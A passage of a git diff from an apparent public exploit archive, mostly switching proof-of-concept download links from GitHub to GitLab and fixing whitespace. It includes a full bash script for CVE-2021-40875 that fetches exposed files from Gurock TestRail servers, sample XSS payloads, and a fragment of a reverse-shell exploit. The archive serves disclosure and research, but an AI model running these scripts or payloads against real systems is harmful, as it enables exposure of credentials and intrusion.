b/exploits/multiple/webapps/14001.txt @@ -16,4 +16,4 @@ parameter “pkg_name” Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14001.pdf (cybsec_advisory_2010_0606_InterScan_Web_Security_5_0_Arbitrary_File_Download.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14001.pdf (cybsec_advisory_2010_0606_InterScan_Web_Security_5_0_Arbitrary_File_Download.pdf) \ No newline at end of file diff --git a/exploits/multiple/webapps/14004.txt b/exploits/multiple/webapps/14004.txt index 6d3d79b24..7a9597b8d 100644 --- a/exploits/multiple/webapps/14004.txt +++ b/exploits/multiple/webapps/14004.txt @@ -14,4 +14,4 @@ Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerabilit Vulnerability Description: InterScan Web Security Virtual Appliance has a shell called “uihelper” that has suid bit on. So it could be possible to execute commands as root. Also using the vulnerability “Arbitrary File Upload” remote commands could be run as root. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14004.pdf (cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14004.pdf (cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf) \ No newline at end of file diff --git a/exploits/multiple/webapps/17393.txt b/exploits/multiple/webapps/17393.txt index 3d303c3a2..dee9753ff 100644 --- a/exploits/multiple/webapps/17393.txt +++ b/exploits/multiple/webapps/17393.txt @@ -69,4 +69,4 @@ Oracle Application Server 10g Release 3 (10.1.3.1.0) Overview of Oracle HTTP Ser http://xss.cx/http-header-injection-expect-response-splitting-cI-113-example-poc.aspx http://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id-707/opxss-1/Oracle-Application-Server.html -PDF Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17393.pdf (XSS_Header_Injection_in_OHS_by_Yasser.pdf) \ No newline at end of file +PDF Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17393.pdf (XSS_Header_Injection_in_OHS_by_Yasser.pdf) \ No newline at end of file diff --git a/exploits/multiple/webapps/33493.txt b/exploits/multiple/webapps/33493.txt index 042faf273..09781e23b 100644 --- a/exploits/multiple/webapps/33493.txt +++ b/exploits/multiple/webapps/33493.txt @@ -38,6 +38,4 @@ Setup -> Smart links -> Create new smart link -> Title it <script>alert("XSS")</ 5. Proof of concept video -http://research.openflare.org/poc/maya-edms/maya-edms_multiple_xss.avi - - +http://research.openflare.org/poc/maya-edms/maya-edms_multiple_xss.avi \ No newline at end of file diff --git a/exploits/multiple/webapps/38706.txt b/exploits/multiple/webapps/38706.txt index 9df40942e..5e4ca265d 100644 --- a/exploits/multiple/webapps/38706.txt +++ b/exploits/multiple/webapps/38706.txt @@ -22,4 +22,4 @@ XSS vulnerability via metadata title 3.5 See Attached image Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38706.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38706.zip \ No newline at end of file diff --git a/exploits/multiple/webapps/42066.txt b/exploits/multiple/webapps/42066.txt index 0445b1aa7..07555c901 100644 --- a/exploits/multiple/webapps/42066.txt +++ b/exploits/multiple/webapps/42066.txt @@ -33,4 +33,4 @@ void ContainerNode::parserInsertBefore(PassRefPtrWillBeRawPtr<Node> newChild, No Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42066.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42066.zip \ No newline at end of file diff --git a/exploits/multiple/webapps/42610.txt b/exploits/multiple/webapps/42610.txt index 93ad68c5a..d02c460b5 100644 --- a/exploits/multiple/webapps/42610.txt +++ b/exploits/multiple/webapps/42610.txt @@ -311,6 +311,4 @@ of vulnerability-lab team & the specific authors or managers. To record, list, m -- VULNERABILITY LABORATORY - RESEARCH TEAM -SERVICE: www.vulnerability-lab.com - - +SERVICE: www.vulnerability-lab.com \ No newline at end of file diff --git a/exploits/multiple/webapps/42613.txt b/exploits/multiple/webapps/42613.txt index 38d0357e2..40c4d5978 100644 --- a/exploits/multiple/webapps/42613.txt +++ b/exploits/multiple/webapps/42613.txt @@ -24,4 +24,4 @@ It's less damaging than a traditional "hack back" but is sure to irritate the lo 3. Symantec Security Bulletin -https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00 +https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00 \ No newline at end of file diff --git a/exploits/multiple/webapps/43002.py b/exploits/multiple/webapps/43002.py index 9d0605b89..2db95e1b7 100755 --- a/exploits/multiple/webapps/43002.py +++ b/exploits/multiple/webapps/43002.py @@ -239,4 +239,4 @@ def end_tran(session, commit=False): if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/43003.py b/exploits/multiple/webapps/43003.py index ba7271af9..cbc5597f0 100755 --- a/exploits/multiple/webapps/43003.py +++ b/exploits/multiple/webapps/43003.py @@ -168,4 +168,4 @@ def is_super_user(session): if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/43004.py b/exploits/multiple/webapps/43004.py index 5514783c8..69b61fcb2 100755 --- a/exploits/multiple/webapps/43004.py +++ b/exploits/multiple/webapps/43004.py @@ -283,4 +283,4 @@ def is_super_user(session): if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/43005.py b/exploits/multiple/webapps/43005.py index d699a782b..722683c24 100755 --- a/exploits/multiple/webapps/43005.py +++ b/exploits/multiple/webapps/43005.py @@ -151,4 +151,4 @@ def is_super_user(session): if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/43024.txt b/exploits/multiple/webapps/43024.txt index 39ca4b75a..01169412d 100644 --- a/exploits/multiple/webapps/43024.txt +++ b/exploits/multiple/webapps/43024.txt @@ -40,4 +40,4 @@ Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: Squeezebox-expandPlayerControl=true; Squeezebox-expanded-MY_MUSIC=0; Squeezebox-expanded-RADIO=0; Squeezebox-expanded-PLUGIN_MY_APPS_MODULE_NAME=0; Squeezebox-expanded-FAVORITES=0; Squeezebox-expanded-PLUGINS=0 Connection: close -Upgrade-Insecure-Requests: 1 +Upgrade-Insecure-Requests: 1 \ No newline at end of file diff --git a/exploits/multiple/webapps/43123.txt b/exploits/multiple/webapps/43123.txt index 8592188e7..48bb3a7a6 100644 --- a/exploits/multiple/webapps/43123.txt +++ b/exploits/multiple/webapps/43123.txt @@ -15,4 +15,4 @@ POC: 2. Add script as the value of the field. 3. Payload : <script> alert(1)</script> 4. Script saved and gives an image msg with a javascript execution on image click. -5. Therefore, Persistent XSS. +5. Therefore, Persistent XSS. \ No newline at end of file diff --git a/exploits/multiple/webapps/49705.py b/exploits/multiple/webapps/49705.py index c2a3c8b23..62881c9d2 100755 --- a/exploits/multiple/webapps/49705.py +++ b/exploits/multiple/webapps/49705.py @@ -147,4 +147,4 @@ def main(): print("[+] Exploit finished!") print("[+] Enjoy your reverse shell!") if __name__ == "__main__": - main() + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/50320.sh b/exploits/multiple/webapps/50320.sh index 93d884881..3de3000fa 100755 --- a/exploits/multiple/webapps/50320.sh +++ b/exploits/multiple/webapps/50320.sh @@ -4,7 +4,7 @@ # Vendor Homepage: https://www.gurock.com/testrail/ # Version: 7.2.0.3014 and below # Tested on: macOS, Linux, Windows -# CVE : CVE-2021-40875 +# CVE : CVE-2021-40875 # Reference: https://johnjhacking.com/blog/cve-2021-40875/ CVE-2021-40875: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data. @@ -12,11 +12,11 @@ CVE-2021-40875: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 # Method 1 #!/bin/bash -# Author: sickcodes & johnjhacking -# Contact: https://twitter.com/sickcodes +# Author: sickcodes & johnjhacking +# Contact: https://twitter.com/sickcodes # https://github.com/SakuraSamuraii/derailed -# Copyright: sickcodes (C) 2021 -# License: GPLv3+ +# Copyright: sickcodes (C) 2021 +# License: GPLv3+ # stop null byte error while curling shopt -s nullglob @@ -25,7 +25,7 @@ shopt -s nullglob TARGET="${1}" -wget https://raw.githubusercontent.com/SakuraSamuraii/derailed/main/files.md5.txt +wget https://raw.githubusercontent.com/SakuraSamuraii/derailed/main/files.md5.txt FILE_LIST="${PWD}/files.md5.txt" @@ -38,62 +38,62 @@ touch ./accessible.log # curl "${TARGET}/files.md5" > ./files.md5 while read -r HASH SUFFIX; do - echo "${SUFFIX}" - TESTING_URL="${TARGET}/${SUFFIX}" - echo "========= ${TESTING_URL} =========" + echo "${SUFFIX}" + TESTING_URL="${TARGET}/${SUFFIX}" + echo "========= ${TESTING_URL} =========" - # Ignore list, some of these files MAY be world readable, - # if the organisation has modified permissions related - # to the below files otherwise, they are ignored. - case "${SUFFIX}" in - *'.php' ) continue - ;; - *'.html' ) continue - ;; - *'LICENSE' ) continue - ;; - *'README.md' ) continue - ;; - *'.js' ) continue - ;; - *'.svg' ) continue - ;; - *'.gif' ) continue - ;; - *'.png' ) continue - ;; - *'.css' ) continue - ;; - *'.exe' ) continue - ;; - # *'.add_your_own' ) continue - # ;; - esac + # Ignore list, some of these files MAY be world readable, + # if the organisation has modified permissions related + # to the below files otherwise, they are ignored. + case "${SUFFIX}" in + *'.php' ) continue + ;; + *'.html' ) continue + ;; + *'LICENSE' ) continue + ;; + *'README.md' ) continue + ;; + *'.js' ) continue + ;; + *'.svg' ) continue + ;; + *'.gif' ) continue + ;; + *'.png' ) continue + ;; + *'.css' ) continue + ;; + *'.exe' ) continue + ;; + # *'.add_your_own' ) continue + # ;; + esac - # peek at page response - # doesn't work because gurock returns 200 and prints the error in plaintext - # curl -s -I -X POST "${TESTING_URL}" + # peek at page response + # doesn't work because gurock returns 200 and prints the error in plaintext + # curl -s -I -X POST "${TESTING_URL}" - # feth the page, following redirects, to a variable - OUTPUT_DATA="$(curl -L -vvvv "${TESTING_URL}")" + # feth the page, following redirects, to a variable + OUTPUT_DATA="$(curl -L -vvvv "${TESTING_URL}")" - # find matching disqualifying pharses in the page contents - # and pass any pages that are "denied access" or "direct script access" - case "${OUTPUT_DATA}" in - *'No direct script'* ) continue - ;; - *'Directory Listing Denied'* ) continue - ;; - esac + # find matching disqualifying pharses in the page contents + # and pass any pages that are "denied access" or "direct script access" + case "${OUTPUT_DATA}" in + *'No direct script'* ) continue + ;; + *'Directory Listing Denied'* ) continue + ;; + esac - # save all interesting pages, without forward slashes - # https://www.target/ - # will be saved as: - # https:::www.target <http://www.target>: - tee "${SUFFIX//\//\:}" <<< "${OUTPUT_DATA}" + # save all interesting pages, without forward slashes + # https://www.target/ + # will be saved as: + # https:::www.target <http://www.target>: + tee "${SUFFIX//\//\:}" <<< "${OUTPUT_DATA}" - # print to stdout, and also append to ./accessible.log the successful saves - tee -a ./accessible.log <<< "${TESTING_URL}" + # print to stdout, and also append to ./accessible.log the successful saves + tee -a ./accessible.log <<< "${TESTING_URL}" done < "${FILE_LIST}" diff --git a/exploits/netbsd_x86/remote/21364.txt b/exploits/netbsd_x86/remote/21364.txt index 7040ef0d1..5da5c4caf 100644 --- a/exploits/netbsd_x86/remote/21364.txt +++ b/exploits/netbsd_x86/remote/21364.txt @@ -8,4 +8,4 @@ This problem is exploitable remotely or locally and may aid an attacker in socia A malicious version of the NetBSD talkd component was used to exploit this issue, so it can be assumed that NetBSD is affected by this issue. However, talkd ships as a core component for a number of Linux and Unix variants and is independently maintained by the various distributions, so it is highly probable that many other operating systems are affected by this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21364.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21364.tar.gz \ No newline at end of file diff --git a/exploits/netware/remote/19364.txt b/exploits/netware/remote/19364.txt index fba5cf68d..ec5c96308 100644 --- a/exploits/netware/remote/19364.txt +++ b/exploits/netware/remote/19364.txt @@ -62,4 +62,4 @@ Now, the decrypted password is: The exploit program does all this automatically. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19364.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19364.zip \ No newline at end of file diff --git a/exploits/nodejs/webapps/43053.txt b/exploits/nodejs/webapps/43053.txt index e6ec6e32c..227696fb4 100644 --- a/exploits/nodejs/webapps/43053.txt +++ b/exploits/nodejs/webapps/43053.txt @@ -46,4 +46,4 @@ https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf -- Best Regards, Ishaq Mohammed -https://about.me/security-prince +https://about.me/security-prince \ No newline at end of file diff --git a/exploits/nodejs/webapps/43054.txt b/exploits/nodejs/webapps/43054.txt index 33bcb3138..f62ca76bd 100644 --- a/exploits/nodejs/webapps/43054.txt +++ b/exploits/nodejs/webapps/43054.txt @@ -42,5 +42,4 @@ https://github.com/keystonejs/keystone/pull/4478/commits/5cb6405dfc0b6d59003c996 Reference: https://github.com/keystonejs/keystone/pull/4478 -https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf - +https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf \ No newline at end of file diff --git a/exploits/novell/dos/14928.py b/exploits/novell/dos/14928.py index 965081064..e957a33cd 100755 --- a/exploits/novell/dos/14928.py +++ b/exploits/novell/dos/14928.py @@ -34,8 +34,4 @@ try: ftp.voidcmd('DELE ' + buffer) except Exception,err: - print err - - - - + print err \ No newline at end of file diff --git a/exploits/novell/dos/31710.txt b/exploits/novell/dos/31710.txt index 7a60361cf..23e58f480 100644 --- a/exploits/novell/dos/31710.txt +++ b/exploits/novell/dos/31710.txt @@ -8,4 +8,4 @@ By exploiting the denial-of-service vulnerability, attackers can crash the appli Novell GroupWise 7 is vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31710.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31710.zip \ No newline at end of file diff --git a/exploits/osx/dos/17567.txt b/exploits/osx/dos/17567.txt index 4a34f531b..7d867ef51 100644 --- a/exploits/osx/dos/17567.txt +++ b/exploits/osx/dos/17567.txt @@ -9,4 +9,4 @@ # Status : Patched */ -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17567.zip (CVE-2011-0222.zip) \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17567.zip (CVE-2011-0222.zip) \ No newline at end of file diff --git a/exploits/osx/dos/27714.txt b/exploits/osx/dos/27714.txt index e33204299..1459cc0fa 100644 --- a/exploits/osx/dos/27714.txt +++ b/exploits/osx/dos/27714.txt @@ -6,8 +6,8 @@ These issue affect Mac OS X and various applications including Safari, Preview, Apple Mac OS X 10.4.6 and prior are reported vulnerable to these issues. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27714-1.html +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27714-1.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27714-2.html +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27714-2.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27714-3.tiff \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27714-3.tiff \ No newline at end of file diff --git a/exploits/osx/dos/27715.txt b/exploits/osx/dos/27715.txt index b47ee73a3..f6d8a412c 100644 --- a/exploits/osx/dos/27715.txt +++ b/exploits/osx/dos/27715.txt @@ -6,4 +6,4 @@ These issue affect Mac OS X and various applications including Safari, Preview, Apple Mac OS X 10.4.6 and prior are reported vulnerable to these issues. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27715.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27715.zip \ No newline at end of file diff --git a/exploits/osx/dos/27790.txt b/exploits/osx/dos/27790.txt index 168756f94..6b7beb65a 100644 --- a/exploits/osx/dos/27790.txt +++ b/exploits/osx/dos/27790.txt @@ -4,4 +4,4 @@ ImageIO is susceptible to a remote denial-of-service vulnerability. This issue i This issue allows remote users to crash applications that use the ImageIO API, denying further service to users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27790.exr \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27790.exr \ No newline at end of file diff --git a/exploits/osx/dos/28521.txt b/exploits/osx/dos/28521.txt index b4d9ea9db..34ab13319 100644 --- a/exploits/osx/dos/28521.txt +++ b/exploits/osx/dos/28521.txt @@ -4,4 +4,4 @@ Apple QuickTime is prone to multiple vulnerabilities because it fails to properl An attacker can exploit these issues to execute arbitrary code in the context of the victim user running the vulnerable application. Successful exploits may facilitate a remote compromise of affected computers. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28521.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28521.zip \ No newline at end of file diff --git a/exploits/osx/dos/29144.txt b/exploits/osx/dos/29144.txt index f0393ac0c..c12f40ba2 100644 --- a/exploits/osx/dos/29144.txt +++ b/exploits/osx/dos/29144.txt @@ -8,4 +8,4 @@ Mac OS X version 10.4.8 is vulnerable to this issue; other versions may also be Note: Further information from Alastair Houghton reports that this issue cannot be exploited to execute arbitrary code. See the references for details. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29144.dmg.bz2 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29144.dmg.bz2 \ No newline at end of file diff --git a/exploits/osx/dos/29161.txt b/exploits/osx/dos/29161.txt index ade8da9cd..65426f818 100644 --- a/exploits/osx/dos/29161.txt +++ b/exploits/osx/dos/29161.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote users to crash affected compute Mac OS X 10.4.8 is vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29161.dmg.bz2 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29161.dmg.bz2 \ No newline at end of file diff --git a/exploits/osx/dos/29441.txt b/exploits/osx/dos/29441.txt index f1982fa9f..0aa71d6a1 100644 --- a/exploits/osx/dos/29441.txt +++ b/exploits/osx/dos/29441.txt @@ -6,4 +6,4 @@ A successful exploit can allow a remote attacker to execute arbitrary code with Mac OS X 10.4.8 and freeBSD 6.1 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29441.dmg.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29441.dmg.gz \ No newline at end of file diff --git a/exploits/osx/dos/29452.txt b/exploits/osx/dos/29452.txt index 1d58e997d..8eb31eef4 100644 --- a/exploits/osx/dos/29452.txt +++ b/exploits/osx/dos/29452.txt @@ -6,4 +6,4 @@ A successful exploit can allow a remote attacker to cause kernel panic, resultin Mac OS X 10.4.8 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29452.dmg.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29452.dmg.gz \ No newline at end of file diff --git a/exploits/osx/dos/29454.txt b/exploits/osx/dos/29454.txt index 0891234e9..f1aa37a26 100644 --- a/exploits/osx/dos/29454.txt +++ b/exploits/osx/dos/29454.txt @@ -6,4 +6,4 @@ A successful exploit can allow an attacker to cause a kernel panic, resulting in Mac OS X 10.4.8 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29454.dmg.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29454.dmg.gz \ No newline at end of file diff --git a/exploits/osx/dos/29509.txt b/exploits/osx/dos/29509.txt index faa62e00c..949770c40 100644 --- a/exploits/osx/dos/29509.txt +++ b/exploits/osx/dos/29509.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to corrupt memory and Mac OS X 10.4.8 is vulnerable to this issue; other versions are also likely affected, since the vulnerable component has been included in Apple operating systems since System 6.0.4 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29509.pct \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29509.pct \ No newline at end of file diff --git a/exploits/osx/dos/29535.txt b/exploits/osx/dos/29535.txt index 68cca3dc4..d66fcb154 100644 --- a/exploits/osx/dos/29535.txt +++ b/exploits/osx/dos/29535.txt @@ -8,4 +8,4 @@ An attacker can exploit this issue to execute arbitrary code within the context Flip4Mac Windows Media Components for QuickTime version 2.1.0.33 is reported vulnerable; other versions may be affected as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29535.wmv \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29535.wmv \ No newline at end of file diff --git a/exploits/osx/dos/29620.txt b/exploits/osx/dos/29620.txt index 58b498e0f..fad0ec3b8 100644 --- a/exploits/osx/dos/29620.txt +++ b/exploits/osx/dos/29620.txt @@ -54,6 +54,6 @@ tommy[at]security-protocols[dot]com -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29620-1.gif +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29620-1.gif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29620-2.gif \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29620-2.gif \ No newline at end of file diff --git a/exploits/osx/dos/38264.txt b/exploits/osx/dos/38264.txt index e140bfb76..5ff10f0c7 100644 --- a/exploits/osx/dos/38264.txt +++ b/exploits/osx/dos/38264.txt @@ -62,4 +62,4 @@ Attack vector: This bug can be triggered by any application that uses the QuickLook framework to generate a preview/thumbnail of DAE (COLLADA) files. For example, loading the supplied POC in Preview or selecting the file in Finder and hitting <space> will trigger the bug. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38264.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38264.zip \ No newline at end of file diff --git a/exploits/osx/dos/39357.txt b/exploits/osx/dos/39357.txt index 0a46e52c2..eb9b04886 100644 --- a/exploits/osx/dos/39357.txt +++ b/exploits/osx/dos/39357.txt @@ -46,4 +46,4 @@ vtable pointer. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39357.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39357.zip \ No newline at end of file diff --git a/exploits/osx/dos/39839.txt b/exploits/osx/dos/39839.txt index 3eb22bf1b..68fef548f 100644 --- a/exploits/osx/dos/39839.txt +++ b/exploits/osx/dos/39839.txt @@ -63,6 +63,6 @@ allocated buffer, which could allow for the execution of arbitrary code in the c =========== http://protekresearchlab.com/exploits/COSIG-2016-19.mov -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39839.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39839.zip ############################################################################### \ No newline at end of file diff --git a/exploits/osx/dos/44238.c b/exploits/osx/dos/44238.c index 1e71f3cd9..43497336f 100644 --- a/exploits/osx/dos/44238.c +++ b/exploits/osx/dos/44238.c @@ -10,7 +10,7 @@ * were changed from 64 bits to 32 bits, so the message structure will need to be updated * accordingly. This exploit has not been tested on iOS. * - * Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44238.zip + * Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44238.zip */ #include <net/if.h> diff --git a/exploits/osx/local/19437.txt b/exploits/osx/local/19437.txt index 3972f2c30..a4e783b10 100644 --- a/exploits/osx/local/19437.txt +++ b/exploits/osx/local/19437.txt @@ -8,4 +8,4 @@ There are two problems: This program, written by mSec, will decrypt the administrator password for Screen to Screen. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19437.sit \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19437.sit \ No newline at end of file diff --git a/exploits/osx/local/19438.txt b/exploits/osx/local/19438.txt index 79c4b5fcc..ea20e9462 100644 --- a/exploits/osx/local/19438.txt +++ b/exploits/osx/local/19438.txt @@ -4,4 +4,4 @@ Autothenticate is an extension for MacOS that remembers usernames and passwords This program, written by mSec, decrypts the Autothenticate information. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19438.sit \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19438.sit \ No newline at end of file diff --git a/exploits/osx/local/19439.txt b/exploits/osx/local/19439.txt index 33f91503e..326a9ca64 100644 --- a/exploits/osx/local/19439.txt +++ b/exploits/osx/local/19439.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/553/info On Guard, a security program for MacOS, includes an emergency password feature in the event that the administrative password is lost or forgotten. If the user name 'emergency' is entered, On Guard will generate an Emergency Code. The user must then call Power On Software, and after registration validation is done, provide the Emergency Code. Power On Software will then provide an emergency password. However, the method used to generate this emergency password has been reverse engineered, and an exploit is publicly available that will automatically generate the emergency password with no phone call. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19439.sit \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19439.sit \ No newline at end of file diff --git a/exploits/osx/local/21070.txt b/exploits/osx/local/21070.txt index d56f3d6c2..c63231f03 100644 --- a/exploits/osx/local/21070.txt +++ b/exploits/osx/local/21070.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/3186/info A user who has set an Open Firmware password on their Apple system believes it to be safe when powered down. There is a tool that any user with access to the Finder can run in order to reveal the Open Firmware password without any decryption. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21070.sit \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21070.sit \ No newline at end of file diff --git a/exploits/osx/local/21076.txt b/exploits/osx/local/21076.txt index 314183ce9..6308dddac 100644 --- a/exploits/osx/local/21076.txt +++ b/exploits/osx/local/21076.txt @@ -6,4 +6,4 @@ Intego FileGuard provides system level access restrictions to versions of Mac OS mSec has released a tool called Disengage which will attempt to decrypt passwords, provided circumstances exist which allow Disengage to work. Passwords for Intego DiskGuard may also be decrypted in this manner. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21076.sit \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21076.sit \ No newline at end of file diff --git a/exploits/osx/local/29190.txt b/exploits/osx/local/29190.txt index 2cd5ac07a..a8bc10049 100644 --- a/exploits/osx/local/29190.txt +++ b/exploits/osx/local/29190.txt @@ -4,4 +4,4 @@ Apple Mac OS X is prone to a local integer-overflow vulnerability. This issue oc A successful exploit would allow a local attacker to execute arbitrary code with kernel-level privileges, leading to the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29190.bz2 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29190.bz2 \ No newline at end of file diff --git a/exploits/osx/local/30096.txt b/exploits/osx/local/30096.txt index 9b62c4d5d..6bee6203d 100644 --- a/exploits/osx/local/30096.txt +++ b/exploits/osx/local/30096.txt @@ -8,4 +8,4 @@ Apple Mac OS X Server 10.4.9 and prior versions are vulnerable to this issue. This issue was originally included in BID 24144 (Apple Mac OS X 2007-005 Multiple Security Vulnerabilities), but has been given its own record. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30096.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30096.tar.gz \ No newline at end of file diff --git a/exploits/osx/local/3181.rb b/exploits/osx/local/3181.rb index 0b0617572..d4d3145f7 100755 --- a/exploits/osx/local/3181.rb +++ b/exploits/osx/local/3181.rb @@ -12,7 +12,7 @@ bugselected = (ARGV[0] || 0).to_i # INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz" # keeping a local backup. /str0ke -INPUTMANAGER_URL = 